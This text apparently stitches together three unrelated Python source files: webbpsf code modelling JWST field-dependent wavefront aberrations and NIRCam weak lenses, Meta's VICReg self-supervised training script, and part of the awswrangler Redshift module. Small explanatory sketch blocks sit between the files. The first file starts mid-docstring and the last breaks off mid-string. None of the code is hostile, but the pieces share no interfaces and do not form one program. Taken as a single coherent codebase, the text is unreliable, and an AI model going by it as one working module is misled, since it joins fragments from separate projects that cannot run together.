Usage: ------ inst = webbpsf.NIRCam() # or any other SI inst._si_wfe_class = LookupTableFieldDependentAberration() """ def __init__(self, instrument, field_points_file=None, phasemap_file=None, which_exercise='MIMF_KDP_2', add_niriss_defocus=None, rm_ptt=None, rm_center_ptt=None, add_mimf_defocus=False, add_sm_defocus=False, nwaves=None, **kwargs): super().__init__( name="Aberrations", **kwargs ) import warnings self.instrument = instrument self.instr_name = instrument.name self.instrument.pupilopd=None # Do not add in the usual telescope WFE on top of this; # This model provided by Ball includes both the telescope and the SI WFE combined. self.rm_ptt = rm_ptt self.which_exercise = which_exercise if self.which_exercise == 'WFR4': add_niriss_defocus=True rm_ptt = True rm_center_ptt = True elif self.which_exercise == 'MIMF_KDP': add_niriss_defocus=False rm_ptt = False rm_center_ptt = False elif self.which_exercise == 'LRE4' or self.which_exercise == 'LRE4-OTE26': add_niriss_defocus=False rm_ptt = False rm_center_ptt = False elif self.which_exercise == 'MIMF_KDP_2': add_niriss_defocus=False rm_ptt = False rm_center_ptt = False if self.instr_name =='NIRCam': self.instr_name += " "+self.instrument.module elif self.instr_name == 'FGS': self.instr_name = self.instrument.detector self.tel_coords = instrument._tel_coords() # load the OPD lookup map table (datacube) here import webbpsf.constants if self.which_exercise == 'WFR4': fp_path = '/ifs/jwst/tel/wfr4_mirage_sims/phase_maps_from_ball/' if field_points_file is None: field_points_file = fp_path + 'The_Field_Coordinates.txt' if phasemap_file is None: phasemap_file = fp_path + 'phase_maps.fits' self.phasemap_file = phasemap_file self.table = Table.read(field_points_file, format='ascii', names=('V2', 'V3')) self.yoffset = -7.8 self.table['V3'] += self.yoffset # Correct from -YAN to actual V3 self.phasemaps = fits.getdata(phasemap_file) self.phasemap_pixelscale = webbpsf.constants.JWST_CIRCUMSCRIBED_DIAMETER/256 * units.meter / units.pixel resample = True elif self.which_exercise == 'MIMF_KDP': fp_path = '/ifs/jwst/tel/MIMF_KDP_Practice/Ball_Phase_Maps/' field_points_file = fp_path + 'coordinates.txt' self.table = Table.read(field_points_file, format='ascii.basic', names=('XWAS', 'YWAS')) # Convert coordinate table to V2V3 in arcminutes self.table['V2'] = -self.table['XWAS'] self.table['V3'] = self.table['YWAS'] - 468/60 phasemap_file = fp_path + 'all_26Feb2021.fits' self.phasemaps = fits.getdata(phasemap_file) self.phasemaps = self.phasemaps.reshape(7*11*11, 256, 256) self.phasemap_pixelscale = webbpsf.constants.JWST_CIRCUMSCRIBED_DIAMETER / 256 * units.meter / units.pixel resample = True elif self.which_exercise == 'LRE4' or self.which_exercise == 'LRE4-OTE26': fp_path = '/ifs/jwst/tel/LRE4/from_ball/' if self.which_exercise == 'LRE4': field_points_file = fp_path + 'coordinates.ecsv' phasemap_file = fp_path + 'rescaled_opds_for_OTE-25.2.fits' elif self.which_exercise == 'LRE4-OTE26': field_points_file = fp_path + 'coordinates-ote26.ecsv' phasemap_file = fp_path + 'rescaled_opds_for_OTE-26.fits' self.table = Table.read(field_points_file) self.phasemaps = fits.getdata(phasemap_file) # Phase maps have been pre-zoomed in this case by the import notebook resample = False self.phasemap_pixelscale = webbpsf.constants.JWST_CIRCUMSCRIBED_DIAMETER / 1024 * units.meter / units.pixel elif self.which_exercise == 'MIMF_KDP_2': fp_path = '/ifs/jwst/tel/MIMF_KDP_Practice_Sept2021/Ball_Phase_Maps/' # Convert coordinate table to V2V3 in arcminutes xcoords = 
fits.getdata(fp_path+"xcor.fits") ycoords = fits.getdata(fp_path+"ycor.fits") V2 = -xcoords.flatten() V3 = ycoords.flatten() - 468/60 self.table = Table([V2,V3], names=['V2','V3']) phasemap_file = fp_path + 'complete_wf.fits' self.phasemaps = fits.getdata(phasemap_file) self.phasemaps = self.phasemaps.reshape(7*11*11, 256, 256) self.phasemap_pixelscale = webbpsf.constants.JWST_CIRCUMSCRIBED_DIAMETER / 256 * units.meter / units.pixel resample = True self.phasemap_file = phasemap_file # Determine the pupil sampling of the first aperture in the # instrument's optical system if isinstance(instrument.pupil, poppy.OpticalElement): # This branch needed to handle the OTE Linear Model case self.pixelscale = instrument.pupil.pixelscale else: # these branches to handle FITS files, by name or as an object if isinstance(instrument.pupil, fits.HDUList): pupilheader = instrument.pupil[0].header else: pupilfile = os.path.join(instrument._datapath, "OPD", instrument.pupil) pupilheader = fits.getheader(pupilfile) self.pixelscale = pupilheader['PUPLSCAL'] * units.meter / units.pixel # Figure out the closest field point telcoords_am = self.tel_coords.to(units.arcmin).value print(f"Requested field point has coord {telcoords_am}") v2 = self.table['V2'] v3 = self.table['V3'] r = np.sqrt((telcoords_am[0] - v2) ** 2 + (telcoords_am[1] - v3) ** 2) closest = np.argmin(r) # if there are two field points with identical coords or equal distance just one is returned print(f"Closest field point is row {closest}:\n{self.table[closest]}") # Save closest ISIM CV3 WFE measured field point for reference self.row = self.table[closest] self.name = "{instrument} at V2V3=({v2:.2f},{v3:.2f}) Lookup table WFE from ({v2t:.2f},{v3t:.2f})".format( instrument=self.instr_name, v2=telcoords_am[0], v3=telcoords_am[1], v2t=self.row['V2'], v3t=self.row['V3'] ) self.si_wfe_type = ("Lookup Table", "SI + OTE WFE from supplied lookup table of phase maps.") # Retrieve the phase map phasemap = self.phasemaps[closest] # The phase maps are provided in OTE entrance pupil orientation, however we need it to be # in exit pupil orientation, so flip it vertically here. phasemap = phasemap[::-1] print("Flipped input phase map vertically into exit pupil orientation.") if resample: if phasemap.shape[0] != 256: raise NotImplementedError("Hard coded for Ball delivery of 256 pixel phase maps") # Resample to 1024 across, by replicating each pixel into a 4x4 block resample_factor = 4 phasemap_big = np.kron(phasemap, np.ones((resample_factor,resample_factor))) else: # no resampling / zooming needed phasemap_big = phasemap self.opd = phasemap_big * 1e-6 # Convert from microns to meters self.amplitude = np.ones_like(self.opd) if rm_ptt: apmask = self.opd != 0 if rm_center_ptt: # Remove the PTT values at the center of each instrument, rather than per field point. This # leaves in the field dependence but takes out the bulk offset # These values are just a precomputed lookup table of the coefficients returned by the # opd_expand_nonorthonormal call just below, for the center field point on each. 
                coeffs_per_si = {"NIRCam A": [-3.50046880e-10, -7.29120639e-08, -1.39751567e-08],
                                 "NIRCam B": [-2.45093780e-09, -2.51804001e-07, -2.64821753e-07],
                                 "NIRISS": [-1.49297771e-09, -2.11111038e-06, -3.99881993e-07],
                                 "FGS1": [ 9.86180620e-09, -5.94041500e-07, 1.18953161e-06],
                                 "FGS2": [ 4.84327424e-09, -8.24285481e-07, 5.09791593e-07],
                                 "MIRI": [-8.75766849e-09, -1.27850277e-06, -1.03467567e-06],}
                coeffs = coeffs_per_si[self.instr_name]
            else:
                coeffs = poppy.zernike.opd_expand_nonorthonormal(self.opd, aperture=apmask, nterms=3)
            ptt_only = poppy.zernike.opd_from_zernikes(coeffs, aperture=apmask,
                                                       npix=self.opd.shape[0], outside=0)
            self.opd -= ptt_only
            print(f"Removing piston, tip, tilt from the input wavefront. Coeffs for {self.instr_name}: {coeffs},")

        if add_mimf_defocus:
            self.instrument.options['defocus_waves'] = 0.8
            self.instrument.options['defocus_wavelength'] = 1e-6  # Add 0.8 microns PTV defocus

        if add_niriss_defocus and self.instr_name == 'NIRISS':
            # The Ball delivery was supposed to have defocused NIRISS for rehearsal purposes, but didn't.
            # So fix that here.
            self.instrument.options['defocus_waves'] = 0.8
            self.instrument.options['defocus_wavelength'] = 1e-6  # Add 0.8 microns PTV defocus
            warnings.warn("Adding defocus=0.8 waves for NIRISS!")

        if add_sm_defocus:
            if nwaves:
                print("ADDING DEFOCUS {:4.1f} WAVES at 2.0 microns".format(nwaves))
                self.instrument.options['defocus_waves'] = nwaves
                self.instrument.options['defocus_wavelength'] = 2.0e-6
            else:
                print("Not adding any defocus; set nwaves")

    def header_keywords(self):
        """ Return info we would like to save in FITS header of output PSFs """
        from collections import OrderedDict
        keywords = OrderedDict()
        keywords['SIWFETYP'] = self.si_wfe_type
        keywords['SIWFEFPT'] = (
            f"{self.row['V2']:.3f}, {self.row['V3']:.3f}",
            "Closest lookup table meas. field point")
        keywords['SIWFEFIL'] = self.phasemap_file
        return keywords

    # wrapper just to change default vmax
    def display(self, *args, **kwargs):
        if 'opd_vmax' not in kwargs:
            kwargs.update({'opd_vmax': 2.5e-7})
        return super().display(*args, **kwargs)


class NIRCamFieldDependentWeakLens(poppy.OpticalElement):
    """Higher-fidelity model of NIRCam weak lens(es), based on calibrated
    as-built performance and field dependence.

    Includes field-dependent variations in defocus power, and in astigmatism.
    Includes variation of the +4 lens' effective OPD when used in a pair with
    either the +8 or -8 lens. These are modeled as the specific values from the
    nearest neighbor ISIM CV calibration point, with no interpolation between
    them included at this time.

    See R. Telfer, 'NIRCam Weak Lens Characterization and Performance', JWST-REF-046515

    Parameters
    -----------
    name : str
        WLP8, WLM8, WLP4, WLM4, WLP12.
    center_fp_only : bool
        For debugging; override to set no field dependence and just use
        the average center field point power
    include_power, include_astigmatism : bool
        Can be used to selectively enable/disable parts of the optical model.
        Intended for debugging; should not need to be set by users in general.
""" def __init__(self, name='WLP8', instrument=None, center_fp_only=False, verbose=False, include_power=True, include_astigmatism=True, **kwargs): super().__init__(name=name) self.ref_wavelength = 2.12e-6 # reference wavelength for defocus self.verbose = verbose if instrument is None: self.module = 'A' self.v2v3_coords = (0, -468 / 60) npix = 1024 else: self.module = instrument.module self.v2v3_coords = instrument._tel_coords() npix, pixelscale = _get_initial_pupil_sampling(instrument) self.ztable_full = None ## REFERENCE: # NIRCam weak lenses, values from WSS config file, PRDOPSFLT-027 # A B # WLP4_diversity = 8.27309 8.3443 diversity in microns # WLP8_diversity = 16.4554 16.5932 # WLM8_diversity = -16.4143 -16.5593 # WL_wavelength = 2.12 Wavelength, in microns if center_fp_only or instrument is None: # use the center field point power only. No field dependence # Power in P-V waves at center field point in optical model # JWST-REF-046515, table 2 Mod A: Mod B: power_at_center_fp = {'WLM8': (-8.0188, -7.9521), 'WLM4': (-4.0285, -3.9766), 'WLP4': (3.9797, 3.9665), 'WLP8': (8.0292, 7.9675), 'WLP12': (12.0010, 11.9275)} power_pv = power_at_center_fp[self.name][0 if self.module == 'A' else 1] astig0 = 0 astig45 = 0 else: closest_fp = self.find_closest_isim_fp_name(instrument) if verbose: print(closest_fp) power_pv, astig0, astig45 = self.lookup_empirical_lens_power(name, closest_fp) self.power_pv_waves = power_pv pv2rms_norm = self.ref_wavelength / (2 * np.sqrt(3)) # convert desired PV waves to RMS microns for power # since the below function wants inputs in RMS self.power_rms_microns = power_pv * pv2rms_norm zernike_coefficients = np.zeros(6) if include_power: zernike_coefficients[3] = self.power_rms_microns if include_astigmatism: zernike_coefficients[4] = astig0 zernike_coefficients[5] = astig45 self.zernike_coefficients = zernike_coefficients self.opd = poppy.zernike.opd_from_zernikes( zernike_coefficients, npix=npix, outside=0 ) self.amplitude = np.ones_like(self.opd) def find_closest_isim_fp_name(self, instr): """Find the closest ISIM CV field point to a given instrument object, i.e. 
the field point closest to the configured detector and coordinates """ if self.ztable_full is None: zernike_file = os.path.join(utils.get_webbpsf_data_path(), "si_zernikes_isim_cv3.fits") self.ztable_full = Table.read(zernike_file) lookup_name = f"NIRCam{instr.channel.upper()[0]}W{instr.module}" ztable = self.ztable_full[self.ztable_full['instrument'] == lookup_name] self._ztable = ztable self._instr = instr telcoords_am = instr._tel_coords().to(units.arcmin).value if self.verbose: print(telcoords_am) r = np.sqrt((telcoords_am[0] - ztable['V2']) ** 2 + (telcoords_am[1] - ztable['V3']) ** 2) # Save closest ISIM CV3 WFE measured field point for reference row = ztable[r == r.min()] return row['field_point_name'] def lookup_empirical_lens_power(self, lens_name, field_point_name): """ Lookup lens power and astigmatism versus field position, from empirical calibrations from ISIM CV testing """ mypath = os.path.dirname(os.path.abspath(__file__)) + os.sep wl_data_file = os.path.join(mypath, 'otelm', 'NIRCam_WL_Empirical_Power.csv') wl_data = Table.read(wl_data_file, comment='#', header_start=1) field_point_row = wl_data[wl_data['Field'] == field_point_name] if self.verbose: print(field_point_row) defocus_name = lens_name[2:] power = field_point_row[defocus_name].data[0] # Fringe zernike coefficients, from Telfer's table z5 = field_point_row[defocus_name+"_Z5"].data[0] z6 = field_point_row[defocus_name + "_Z6"].data[0] # Have to convert Zernike normalization and order from fringe to noll, and nanometers to meters astig0 = z6 / np.sqrt(6)*1e-9 astig45 = z5 / np.sqrt(6)*1e-9 if self.verbose: print(power) return power, astig0, astig45
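# ---------------------------------------------------------------------------
# A minimal standalone sketch (not part of webbpsf itself) of the nearest-
# field-point lookup pattern shared by the field-dependent aberration classes
# above: measure the Euclidean distance in (V2, V3) arcminutes from the
# requested telescope coordinate to every calibrated field point, then take
# the row at the minimum distance. The three field points below are invented
# placeholders purely to illustrate the pattern; the real classes read them
# from si_zernikes_isim_cv3.fits.

import numpy as np
from astropy.table import Table


def demo_closest_field_point(v2_tel=2.1, v3_tel=-8.4):
    # Hypothetical calibration table standing in for the Zernike table rows.
    ztable = Table({'field_point_name': ['FP1', 'FP2', 'FP3'],
                    'V2': [1.0, 2.0, 3.0],
                    'V3': [-8.0, -8.5, -9.0]})
    # Same distance-and-argmin selection used in WebbFieldDependentAberration.
    r = np.sqrt((v2_tel - ztable['V2']) ** 2 + (v3_tel - ztable['V3']) ** 2)
    return ztable[np.argmin(r)]  # nearest row ('FP2' for the default inputs)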
# Copyright (c) Meta Platforms, Inc. and affiliates. # All rights reserved. # This source code is licensed under the license found in the # LICENSE file in the root directory of this source tree. from pathlib import Path import argparse import json import math import os import sys import time import torch import torch.nn.functional as F from torch import nn, optim import torch.distributed as dist import torchvision.datasets as datasets import augmentations as aug from distributed import init_distributed_mode import resnet def get_arguments(): parser = argparse.ArgumentParser(description="Pretrain a resnet model with VICReg", add_help=False) # Data parser.add_argument("--data-dir", type=Path, default="/path/to/imagenet", required=True, help='Path to the image net dataset') # Checkpoints parser.add_argument("--exp-dir", type=Path, default="./exp", help='Path to the experiment folder, where all logs/checkpoints will be stored') parser.add_argument("--log-freq-time", type=int, default=60, help='Print logs to the stats.txt file every [log-freq-time] seconds') # Model parser.add_argument("--arch", type=str, default="resnet50", help='Architecture of the backbone encoder network') parser.add_argument("--mlp", default="8192-8192-8192", help='Size and number of layers of the MLP expander head') # Optim parser.add_argument("--epochs", type=int, default=100, help='Number of epochs') parser.add_argument("--batch-size", type=int, default=2048, help='Effective batch size (per worker batch size is [batch-size] / world-size)') parser.add_argument("--base-lr", type=float, default=0.2, help='Base learning rate, effective learning after warmup is [base-lr] * [batch-size] / 256') parser.add_argument("--wd", type=float, default=1e-6, help='Weight decay') # Loss parser.add_argument("--sim-coeff", type=float, default=25.0, help='Invariance regularization loss coefficient') parser.add_argument("--std-coeff", type=float, default=25.0, help='Variance regularization loss coefficient') parser.add_argument("--cov-coeff", type=float, default=1.0, help='Covariance regularization loss coefficient') # Running parser.add_argument("--num-workers", type=int, default=10) parser.add_argument('--device', default='cuda', help='device to use for training / testing') # Distributed parser.add_argument('--world-size', default=1, type=int, help='number of distributed processes') parser.add_argument('--local_rank', default=-1, type=int) parser.add_argument('--dist-url', default='env://', help='url used to set up distributed training') return parser def main(args): torch.backends.cudnn.benchmark = True init_distributed_mode(args) print(args) gpu = torch.device(args.device) if args.rank == 0: args.exp_dir.mkdir(parents=True, exist_ok=True) stats_file = open(args.exp_dir / "stats.txt", "a", buffering=1) print(" ".join(sys.argv)) print(" ".join(sys.argv), file=stats_file) transforms = aug.TrainTransform() dataset = datasets.ImageFolder(args.data_dir / "train", transforms) sampler = torch.utils.data.distributed.DistributedSampler(dataset, shuffle=True) assert args.batch_size % args.world_size == 0 per_device_batch_size = args.batch_size // args.world_size loader = torch.utils.data.DataLoader( dataset, batch_size=per_device_batch_size, num_workers=args.num_workers, pin_memory=True, sampler=sampler, ) model = VICReg(args).cuda(gpu) model = nn.SyncBatchNorm.convert_sync_batchnorm(model) model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[gpu]) optimizer = LARS( model.parameters(), lr=0, weight_decay=args.wd, 
weight_decay_filter=exclude_bias_and_norm, lars_adaptation_filter=exclude_bias_and_norm, ) if (args.exp_dir / "model.pth").is_file(): if args.rank == 0: print("resuming from checkpoint") ckpt = torch.load(args.exp_dir / "model.pth", map_location="cpu") start_epoch = ckpt["epoch"] model.load_state_dict(ckpt["model"]) optimizer.load_state_dict(ckpt["optimizer"]) else: start_epoch = 0 start_time = last_logging = time.time() scaler = torch.cuda.amp.GradScaler() for epoch in range(start_epoch, args.epochs): sampler.set_epoch(epoch) for step, ((x, y), _) in enumerate(loader, start=epoch * len(loader)): x = x.cuda(gpu, non_blocking=True) y = y.cuda(gpu, non_blocking=True) lr = adjust_learning_rate(args, optimizer, loader, step) optimizer.zero_grad() with torch.cuda.amp.autocast(): loss = model.forward(x, y) scaler.scale(loss).backward() scaler.step(optimizer) scaler.update() current_time = time.time() if args.rank == 0 and current_time - last_logging > args.log_freq_time: stats = dict( epoch=epoch, step=step, loss=loss.item(), time=int(current_time - start_time), lr=lr, ) print(json.dumps(stats)) print(json.dumps(stats), file=stats_file) last_logging = current_time if args.rank == 0: state = dict( epoch=epoch + 1, model=model.state_dict(), optimizer=optimizer.state_dict(), ) torch.save(state, args.exp_dir / "model.pth") if args.rank == 0: torch.save(model.module.backbone.state_dict(), args.exp_dir / "resnet50.pth") def adjust_learning_rate(args, optimizer, loader, step): max_steps = args.epochs * len(loader) warmup_steps = 10 * len(loader) base_lr = args.base_lr * args.batch_size / 256 if step < warmup_steps: lr = base_lr * step / warmup_steps else: step -= warmup_steps max_steps -= warmup_steps q = 0.5 * (1 + math.cos(math.pi * step / max_steps)) end_lr = base_lr * 0.001 lr = base_lr * q + end_lr * (1 - q) for param_group in optimizer.param_groups: param_group["lr"] = lr return lr class VICReg(nn.Module): def __init__(self, args): super().__init__() self.args = args self.num_features = int(args.mlp.split("-")[-1]) self.backbone, self.embedding = resnet.__dict__[args.arch]( zero_init_residual=True ) self.projector = Projector(args, self.embedding) def forward(self, x, y): x = self.projector(self.backbone(x)) y = self.projector(self.backbone(y)) repr_loss = F.mse_loss(x, y) x = torch.cat(FullGatherLayer.apply(x), dim=0) y = torch.cat(FullGatherLayer.apply(y), dim=0) x = x - x.mean(dim=0) y = y - y.mean(dim=0) std_x = torch.sqrt(x.var(dim=0) + 0.0001) std_y = torch.sqrt(y.var(dim=0) + 0.0001) std_loss = torch.mean(F.relu(1 - std_x)) / 2 + torch.mean(F.relu(1 - std_y)) / 2 cov_x = (x.T @ x) / (self.args.batch_size - 1) cov_y = (y.T @ y) / (self.args.batch_size - 1) cov_loss = off_diagonal(cov_x).pow_(2).sum().div( self.num_features ) + off_diagonal(cov_y).pow_(2).sum().div(self.num_features) loss = ( self.args.sim_coeff * repr_loss + self.args.std_coeff * std_loss + self.args.cov_coeff * cov_loss ) return loss def Projector(args, embedding): mlp_spec = f"{embedding}-{args.mlp}" layers = [] f = list(map(int, mlp_spec.split("-"))) for i in range(len(f) - 2): layers.append(nn.Linear(f[i], f[i + 1])) layers.append(nn.BatchNorm1d(f[i + 1])) layers.append(nn.ReLU(True)) layers.append(nn.Linear(f[-2], f[-1], bias=False)) return nn.Sequential(*layers) def exclude_bias_and_norm(p): return p.ndim == 1 def off_diagonal(x): n, m = x.shape assert n == m return x.flatten()[:-1].view(n - 1, n + 1)[:, 1:].flatten() class LARS(optim.Optimizer): def __init__( self, params, lr, weight_decay=0, momentum=0.9, eta=0.001, 
        weight_decay_filter=None,
        lars_adaptation_filter=None,
    ):
        defaults = dict(
            lr=lr,
            weight_decay=weight_decay,
            momentum=momentum,
            eta=eta,
            weight_decay_filter=weight_decay_filter,
            lars_adaptation_filter=lars_adaptation_filter,
        )
        super().__init__(params, defaults)

    @torch.no_grad()
    def step(self):
        for g in self.param_groups:
            for p in g["params"]:
                dp = p.grad

                if dp is None:
                    continue

                if g["weight_decay_filter"] is None or not g["weight_decay_filter"](p):
                    dp = dp.add(p, alpha=g["weight_decay"])

                if g["lars_adaptation_filter"] is None or not g[
                    "lars_adaptation_filter"
                ](p):
                    param_norm = torch.norm(p)
                    update_norm = torch.norm(dp)
                    one = torch.ones_like(param_norm)
                    q = torch.where(
                        param_norm > 0.0,
                        torch.where(
                            update_norm > 0, (g["eta"] * param_norm / update_norm), one
                        ),
                        one,
                    )
                    dp = dp.mul(q)

                param_state = self.state[p]
                if "mu" not in param_state:
                    param_state["mu"] = torch.zeros_like(p)
                mu = param_state["mu"]
                mu.mul_(g["momentum"]).add_(dp)

                p.add_(mu, alpha=-g["lr"])


def batch_all_gather(x):
    x_list = FullGatherLayer.apply(x)
    return torch.cat(x_list, dim=0)


class FullGatherLayer(torch.autograd.Function):
    """
    Gather tensors from all processes and support backward propagation
    for the gradients across processes.
    """

    @staticmethod
    def forward(ctx, x):
        output = [torch.zeros_like(x) for _ in range(dist.get_world_size())]
        dist.all_gather(output, x)
        return tuple(output)

    @staticmethod
    def backward(ctx, *grads):
        all_gradients = torch.stack(grads)
        dist.all_reduce(all_gradients)
        return all_gradients[dist.get_rank()]


def handle_sigusr1(signum, frame):
    os.system(f'scontrol requeue {os.environ["SLURM_JOB_ID"]}')
    exit()


def handle_sigterm(signum, frame):
    pass


if __name__ == "__main__":
    parser = argparse.ArgumentParser('VICReg training script', parents=[get_arguments()])
    args = parser.parse_args()
    main(args)
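# ---------------------------------------------------------------------------
# Hedged single-process sketch of the three loss terms computed in
# VICReg.forward above, evaluated on random embeddings so the arithmetic can
# be inspected in isolation. Assumption: world size 1, so the distributed
# FullGatherLayer step is skipped; the off-diagonal helper is re-defined
# locally to keep the sketch self-contained. Coefficients mirror the defaults
# in get_arguments().

import torch
import torch.nn.functional as F


def vicreg_loss_demo(batch_size=64, num_features=128,
                     sim_coeff=25.0, std_coeff=25.0, cov_coeff=1.0):
    x = torch.randn(batch_size, num_features)
    y = torch.randn(batch_size, num_features)

    # Invariance term: mean squared error between the two embeddings.
    repr_loss = F.mse_loss(x, y)

    # Variance term: hinge loss on each dimension's standard deviation.
    x = x - x.mean(dim=0)
    y = y - y.mean(dim=0)
    std_x = torch.sqrt(x.var(dim=0) + 0.0001)
    std_y = torch.sqrt(y.var(dim=0) + 0.0001)
    std_loss = F.relu(1 - std_x).mean() / 2 + F.relu(1 - std_y).mean() / 2

    # Covariance term: penalize off-diagonal entries of the covariance matrix.
    def off_diag(m):
        n = m.shape[0]
        return m.flatten()[:-1].view(n - 1, n + 1)[:, 1:].flatten()

    cov_x = (x.T @ x) / (batch_size - 1)
    cov_y = (y.T @ y) / (batch_size - 1)
    cov_loss = (off_diag(cov_x).pow(2).sum()
                + off_diag(cov_y).pow(2).sum()) / num_features

    return sim_coeff * repr_loss + std_coeff * std_loss + cov_coeff * cov_loss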
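# ---------------------------------------------------------------------------
# Hedged sketch of the staging-table upsert pattern used by _upsert() in the
# Redshift module below: delete target rows that collide with the staged data
# on the primary keys, then insert everything from the staging table. This
# only builds the SQL strings; the schema, table, and key names are invented
# placeholders, not values from the module itself.


def build_upsert_sql(schema='public', table='target',
                     temp_table='temp_stage', primary_keys=('id',)):
    join_clause = ' AND '.join(
        f'{table}.{pk} = {temp_table}.{pk}' for pk in primary_keys)
    delete_sql = f'DELETE FROM "{schema}"."{table}" USING {temp_table} WHERE {join_clause}'
    insert_sql = f'INSERT INTO {schema}.{table} SELECT * FROM {temp_table}'
    return delete_sql, insert_sql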
"""Amazon Redshift Module.""" # pylint: disable=too-many-lines import logging import uuid from typing import Any, Dict, Iterator, List, Optional, Tuple, Union import boto3 import botocore import pandas as pd import pyarrow as pa import redshift_connector from awswrangler import _data_types from awswrangler import _databases as _db_utils from awswrangler import _utils, exceptions, s3 from awswrangler._config import apply_configs _logger: logging.Logger = logging.getLogger(__name__) _RS_DISTSTYLES: List[str] = ["AUTO", "EVEN", "ALL", "KEY"] _RS_SORTSTYLES: List[str] = ["COMPOUND", "INTERLEAVED"] def _validate_connection(con: redshift_connector.Connection) -> None: if not isinstance(con, redshift_connector.Connection): raise exceptions.InvalidConnection( "Invalid 'conn' argument, please pass a " "redshift_connector.Connection object. Use redshift_connector.connect() to use " "credentials directly or wr.redshift.connect() to fetch it from the Glue Catalog." ) def _begin_transaction(cursor: redshift_connector.Cursor) -> None: sql = "BEGIN TRANSACTION" _logger.debug("Begin transaction query:\n%s", sql) cursor.execute(sql) def _drop_table(cursor: redshift_connector.Cursor, schema: Optional[str], table: str, cascade: bool = False) -> None: schema_str = f'"{schema}".' if schema else "" cascade_str = " CASCADE" if cascade else "" sql = f'DROP TABLE IF EXISTS {schema_str}"{table}"' f"{cascade_str}" _logger.debug("Drop table query:\n%s", sql) cursor.execute(sql) def _truncate_table(cursor: redshift_connector.Cursor, schema: Optional[str], table: str) -> None: schema_str = f'"{schema}".' if schema else "" sql = f'TRUNCATE TABLE {schema_str}"{table}"' _logger.debug("Truncate table query:\n%s", sql) cursor.execute(sql) def _delete_all(cursor: redshift_connector.Cursor, schema: Optional[str], table: str) -> None: schema_str = f'"{schema}".' 
if schema else "" sql = f'DELETE FROM {schema_str}"{table}"' _logger.debug("Delete query:\n%s", sql) cursor.execute(sql) def _get_primary_keys(cursor: redshift_connector.Cursor, schema: str, table: str) -> List[str]: cursor.execute(f"SELECT indexdef FROM pg_indexes WHERE schemaname = '{schema}' AND tablename = '{table}'") result: str = cursor.fetchall()[0][0] rfields: List[str] = result.split("(")[1].strip(")").split(",") fields: List[str] = [field.strip().strip('"') for field in rfields] return fields def _does_table_exist(cursor: redshift_connector.Cursor, schema: Optional[str], table: str) -> bool: schema_str = f"TABLE_SCHEMA = '{schema}' AND" if schema else "" cursor.execute( f"SELECT true WHERE EXISTS (" f"SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE " f"{schema_str} TABLE_NAME = '{table}'" f");" ) return len(cursor.fetchall()) > 0 def _make_s3_auth_string( aws_access_key_id: Optional[str] = None, aws_secret_access_key: Optional[str] = None, aws_session_token: Optional[str] = None, iam_role: Optional[str] = None, boto3_session: Optional[boto3.Session] = None, ) -> str: if aws_access_key_id is not None and aws_secret_access_key is not None: auth_str: str = f"ACCESS_KEY_ID '{aws_access_key_id}'\nSECRET_ACCESS_KEY '{aws_secret_access_key}'\n" if aws_session_token is not None: auth_str += f"SESSION_TOKEN '{aws_session_token}'\n" elif iam_role is not None: auth_str = f"IAM_ROLE '{iam_role}'\n" else: _logger.debug("Attempting to get S3 authorization credentials from boto3 session.") credentials: botocore.credentials.ReadOnlyCredentials credentials = _utils.get_credentials_from_session(boto3_session=boto3_session) if credentials.access_key is None or credentials.secret_key is None: raise exceptions.InvalidArgument( "One of IAM Role or AWS ACCESS_KEY_ID and SECRET_ACCESS_KEY must be " "given. Unable to find ACCESS_KEY_ID and SECRET_ACCESS_KEY in boto3 " "session." 
) auth_str = f"ACCESS_KEY_ID '{credentials.access_key}'\nSECRET_ACCESS_KEY '{credentials.secret_key}'\n" if credentials.token is not None: auth_str += f"SESSION_TOKEN '{credentials.token}'\n" return auth_str def _copy( cursor: redshift_connector.Cursor, path: str, table: str, serialize_to_json: bool, iam_role: Optional[str] = None, aws_access_key_id: Optional[str] = None, aws_secret_access_key: Optional[str] = None, aws_session_token: Optional[str] = None, boto3_session: Optional[str] = None, schema: Optional[str] = None, ) -> None: if schema is None: table_name: str = f'"{table}"' else: table_name = f'"{schema}"."{table}"' auth_str: str = _make_s3_auth_string( iam_role=iam_role, aws_access_key_id=aws_access_key_id, aws_secret_access_key=aws_secret_access_key, aws_session_token=aws_session_token, boto3_session=boto3_session, ) ser_json_str: str = " SERIALIZETOJSON" if serialize_to_json else "" sql: str = f"COPY {table_name}\nFROM '{path}' {auth_str}\nFORMAT AS PARQUET{ser_json_str}" _logger.debug("copy query:\n%s", sql) cursor.execute(sql) def _lock( cursor: redshift_connector.Cursor, table_names: List[str], schema: Optional[str] = None, ) -> None: fmt = '"{schema}"."{table}"' if schema else '"{table}"' tables = ", ".join([fmt.format(schema=schema, table=table) for table in table_names]) sql: str = f"LOCK {tables};\n" _logger.debug("lock query:\n%s", sql) cursor.execute(sql) def _upsert( cursor: redshift_connector.Cursor, table: str, temp_table: str, schema: str, primary_keys: Optional[List[str]] = None, ) -> None: if not primary_keys: primary_keys = _get_primary_keys(cursor=cursor, schema=schema, table=table) _logger.debug("primary_keys: %s", primary_keys) if not primary_keys: raise exceptions.InvalidRedshiftPrimaryKeys() equals_clause: str = f"{table}.%s = {temp_table}.%s" join_clause: str = " AND ".join([equals_clause % (pk, pk) for pk in primary_keys]) sql: str = f'DELETE FROM "{schema}"."{table}" USING {temp_table} WHERE {join_clause}' _logger.debug(sql) cursor.execute(sql) sql = f"INSERT INTO {schema}.{table} SELECT * FROM {temp_table}" _logger.debug(sql) cursor.execute(sql) _drop_table(cursor=cursor, schema=schema, table=temp_table) def _validate_parameters( redshift_types: Dict[str, str], diststyle: str, distkey: Optional[str], sortstyle: str, sortkey: Optional[List[str]], ) -> None: if diststyle not in _RS_DISTSTYLES: raise exceptions.InvalidRedshiftDiststyle(f"diststyle must be in {_RS_DISTSTYLES}") cols = list(redshift_types.keys()) _logger.debug("Redshift columns: %s", cols) if (diststyle == "KEY") and (not distkey): raise exceptions.InvalidRedshiftDistkey("You must pass a distkey if you intend to use KEY diststyle") if distkey and distkey not in cols: raise exceptions.InvalidRedshiftDistkey(f"distkey ({distkey}) must be in the columns list: {cols})") if sortstyle and sortstyle not in _RS_SORTSTYLES: raise exceptions.InvalidRedshiftSortstyle(f"sortstyle must be in {_RS_SORTSTYLES}") if sortkey: if not isinstance(sortkey, list): raise exceptions.InvalidRedshiftSortkey( f"sortkey must be a List of items in the columns list: {cols}. " f"Currently value: {sortkey}" ) for key in sortkey: if key not in cols: raise exceptions.InvalidRedshiftSortkey( f"sortkey must be a List of items in the columns list: {cols}. 
